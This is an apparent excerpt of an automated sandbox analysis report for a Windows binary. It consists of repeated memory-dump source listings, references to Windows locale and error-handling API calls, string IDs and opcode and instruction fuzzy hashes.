                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$EnumLocalesSystem
                                                                                    • String ID:
                                                                                    • API String ID: 2417226690-0
                                                                                    • Opcode ID: 3215ec8fc6b10d35a144f48d2eaa9064e25b30e75b2209268808a8329169578e
                                                                                    • Instruction ID: c90134bd660cd73b81e83760c3ccda9ec5946c737cd25f150421bf6d2f6ebae4
                                                                                    • Opcode Fuzzy Hash: 3215ec8fc6b10d35a144f48d2eaa9064e25b30e75b2209268808a8329169578e
                                                                                    • Instruction Fuzzy Hash: 7911E53A6047019FDB189F39C9A16BABB91FF81368B15442CE98787A40E371B982E740
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: ^
                                                                                    • API String ID: 0-1590793086
                                                                                    • Opcode ID: 487b0a31c337bc3de320649b6d8d9c0e1233b727a66ad628b387866d6b68bc7f
                                                                                    • Instruction ID: be949cd13a14be1e62c60944784c8cc7217465395f885a58ba8164b156ac83ad
                                                                                    • Opcode Fuzzy Hash: 487b0a31c337bc3de320649b6d8d9c0e1233b727a66ad628b387866d6b68bc7f
                                                                                    • Instruction Fuzzy Hash: FBA105317086514FDB24CF24D49273ABBE1EF8531AF0846DDED998B282D721EC89C792
                                                                                    APIs
                                                                                      • Part of subcall function 00C0D281: GetLastError.KERNEL32(00000000,00000000,00000000,00C0B710,?,?,00C12E05,?,00000000,00000040,00000000,00000000,00000040,?,00000000,00000080), ref: 00C0D286
                                                                                      • Part of subcall function 00C0D281: SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,00C12E05,?,00000000,00000040,00000000,00000000,00000040,?,00000000,00000080,00000000), ref: 00C0D324
                                                                                    • EnumSystemLocalesW.KERNEL32(00C16E69,00000001,00000000,?,-00000050,?,00C17208,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 00C16BD5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$EnumLocalesSystem
                                                                                    • String ID:
                                                                                    • API String ID: 2417226690-0
                                                                                    • Opcode ID: f4854bd22eacdf0913352f8eac4c5c1117c2b889e101be5c1f08c5eaf97e709d
                                                                                    • Instruction ID: c210fad5f8b5f74dd1af7aa1a2304723bacae2bdd584512e8dcd77d6adadebbf
                                                                                    • Opcode Fuzzy Hash: f4854bd22eacdf0913352f8eac4c5c1117c2b889e101be5c1f08c5eaf97e709d
                                                                                    • Instruction Fuzzy Hash: B2F0F6363043045FDB245F79D881ABA7B95EF81768F05442DF9068B680D6B1AD82F750
                                                                                    APIs
                                                                                      • Part of subcall function 00C0B3DE: EnterCriticalSection.KERNEL32(-00C5C910,?,00C080C1,00000000,00C54078,0000000C,00C08088,00BBD963,?,00C0D82F,00BBD963,?,00C0D423,00000001,00000364,00000006), ref: 00C0B3ED
                                                                                    • EnumSystemLocalesW.KERNEL32(00C0EA2A,00000001,00C54278,0000000C,00C0EE95,00000000), ref: 00C0EA6F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                    • String ID:
                                                                                    • API String ID: 1272433827-0
                                                                                    • Opcode ID: caf5bcc726d4b902794db41d886521775985bf84441ac727e86f55d4629db468
                                                                                    • Instruction ID: e3f4b8c655bb065119894ab66d233d70fb9aaa913934b50be0de57eb70fa8686
                                                                                    • Opcode Fuzzy Hash: caf5bcc726d4b902794db41d886521775985bf84441ac727e86f55d4629db468
                                                                                    • Instruction Fuzzy Hash: A9F01476A50314DFDB10DF98E842B9D7BF0FB48722F10416AF511AB2E0DBB56984DB84
                                                                                    APIs
                                                                                      • Part of subcall function 00C0D281: GetLastError.KERNEL32(00000000,00000000,00000000,00C0B710,?,?,00C12E05,?,00000000,00000040,00000000,00000000,00000040,?,00000000,00000080), ref: 00C0D286
                                                                                      • Part of subcall function 00C0D281: SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,00C12E05,?,00000000,00000040,00000000,00000000,00000040,?,00000000,00000080,00000000), ref: 00C0D324
                                                                                    • EnumSystemLocalesW.KERNEL32(00C169FE,00000001,00000000,?,?,00C17266,-00000050,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 00C16ADC
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$EnumLocalesSystem
                                                                                    • String ID:
                                                                                    • API String ID: 2417226690-0
                                                                                    • Opcode ID: 669a5183d6e6d95953c1f09f9516c1a44e436990166b8dbb02b704a345b673ac
                                                                                    • Instruction ID: a7043940f0b9f7ca8a7f58c206193477a1e708ef82ee878146efbca7cfde7bc7
                                                                                    • Opcode Fuzzy Hash: 669a5183d6e6d95953c1f09f9516c1a44e436990166b8dbb02b704a345b673ac
                                                                                    • Instruction Fuzzy Hash: 97F0E53630020557CB149F79D845BAA7F94EFC2720F0680A8EA168B690C775D983E790
                                                                                    APIs
                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,00C0AEEF,?,20001004,00000000,00000002,?,?,00C0A4FC), ref: 00C0EFCD
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: InfoLocale
                                                                                    • String ID:
                                                                                    • API String ID: 2299586839-0
                                                                                    • Opcode ID: 4eb2c2499c25a219b018b659909043775fdec3d53c5a8fcc2700962d6b1720c1
                                                                                    • Instruction ID: 9923a360a17f89674e60f13a33d455d7df05d0b2f65e76af708c32bb7d0caa38
                                                                                    • Opcode Fuzzy Hash: 4eb2c2499c25a219b018b659909043775fdec3d53c5a8fcc2700962d6b1720c1
                                                                                    • Instruction Fuzzy Hash: 87E04F31544618BBCF222FA1EC04F9E7F16EF44760F144420FD15656A1CB718E22EA95
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: winUnlockReadLock
                                                                                    • API String ID: 0-4244601998
                                                                                    • Opcode ID: 7a1917a74b51307fb75f017fc677c6e015cbd15c0aa9211c246317cd5b1cdcc7
                                                                                    • Instruction ID: 70a49f628cd54783223dbd602a3190f8824e244d2a7200831e625b558575b9b8
                                                                                    • Opcode Fuzzy Hash: 7a1917a74b51307fb75f017fc677c6e015cbd15c0aa9211c246317cd5b1cdcc7
                                                                                    • Instruction Fuzzy Hash: 6491A175A003099FDB20CFA1DC857EEBBF5FF48701F10825AE905BA290DBB5A9C48B51
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 0
                                                                                    • API String ID: 0-4108050209
                                                                                    • Opcode ID: 60587a24c710a7382d416dd49bd1c715702abd811a578e6df4fe3b805604401f
                                                                                    • Instruction ID: 38b7e3419e296a62a6434af39136cea1bb6b4fc6ce55a87628fd2e9ddac2807c
                                                                                    • Opcode Fuzzy Hash: 60587a24c710a7382d416dd49bd1c715702abd811a578e6df4fe3b805604401f
                                                                                    • Instruction Fuzzy Hash: 0751577060460C6ADB38AB6C88D97BEB7DBDF02380F5449DAD783DB692C651ED4C8352
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 0
                                                                                    • API String ID: 0-4108050209
                                                                                    • Opcode ID: 18277e1badddfd89e6becae11859ba1a9e8961f9cd1253666cef36274f0f04ab
                                                                                    • Instruction ID: 3a9dd25232bfc415ee4197d4eb6d0f28eea663da1b2531381e180a154677d024
                                                                                    • Opcode Fuzzy Hash: 18277e1badddfd89e6becae11859ba1a9e8961f9cd1253666cef36274f0f04ab
                                                                                    • Instruction Fuzzy Hash: C1517C7020864D6ADF389E6C84D57BE67DBDB02304F5886DEE782D7292D661DD4CC309
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 08c0c01a1d3bb86c0bffef1482e63b62dd844d6f70f83d3afbfa25011f711384
                                                                                    • Instruction ID: 273729f81fd7a2af4db4dd73d6192e2a908e60bf64bed2d45e7369459b2c7bcb
                                                                                    • Opcode Fuzzy Hash: 08c0c01a1d3bb86c0bffef1482e63b62dd844d6f70f83d3afbfa25011f711384
                                                                                    • Instruction Fuzzy Hash: 0E324875D39F014ED7279635DC2233AA249AFB73C4F14D727E929B49EAEB2885C38500
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f913cbc7be3b39f895f73ecffceb291a04dcf7fca67fe4e29ced2dc85a429910
                                                                                    • Instruction ID: 106dba4a6620d1d9132b878a0b0c783743d409ab649590db4e2cb9f000b465c4
                                                                                    • Opcode Fuzzy Hash: f913cbc7be3b39f895f73ecffceb291a04dcf7fca67fe4e29ced2dc85a429910
                                                                                    • Instruction Fuzzy Hash: FC321331D29F014DE7239634D822339A248AFB73D4F15D727EC2AB59AAEF29C5C75100
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 49b708d99c6969ca08429d2064d4957bd6036b36de6859e5ea2b830fd842c80d
                                                                                    • Instruction ID: 9e8ed1e996d68b989c5613a6a5f987935a4671e30f52d64e263d9ef78298590b
                                                                                    • Opcode Fuzzy Hash: 49b708d99c6969ca08429d2064d4957bd6036b36de6859e5ea2b830fd842c80d
                                                                                    • Instruction Fuzzy Hash: 05527174D1419A8FDB08CF5CC891BBDBBB2EF85301F1881B9D116AB786C639AB41DB50
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f8115b51cbe56b45c3815170906792292e4eebac451ecace5359f16459efebbd
                                                                                    • Instruction ID: 46ecadac16cd74877d096a058ddcb11006b0d6007c0ed191c4fc370c0600fb83
                                                                                    • Opcode Fuzzy Hash: f8115b51cbe56b45c3815170906792292e4eebac451ecace5359f16459efebbd
                                                                                    • Instruction Fuzzy Hash: 0A527F74D1019A8FDB48CF5CC891BBDBBB2EF85301F1881B9D116AB796C638AB41DB50
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 6208c4ebbd5734a4139a4f852d79b2e56145e90d2829784fa89412820b01877f
                                                                                    • Instruction ID: 809170d6ae7d4f5f1893803017b4d1dd935654ad9dcec7124c41c3c4370c1034
                                                                                    • Opcode Fuzzy Hash: 6208c4ebbd5734a4139a4f852d79b2e56145e90d2829784fa89412820b01877f
                                                                                    • Instruction Fuzzy Hash: 4A5260B4E0420ADFCB08CF98C5919AEFBB2FF88310F248299D815A7355D734AA51DF94
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
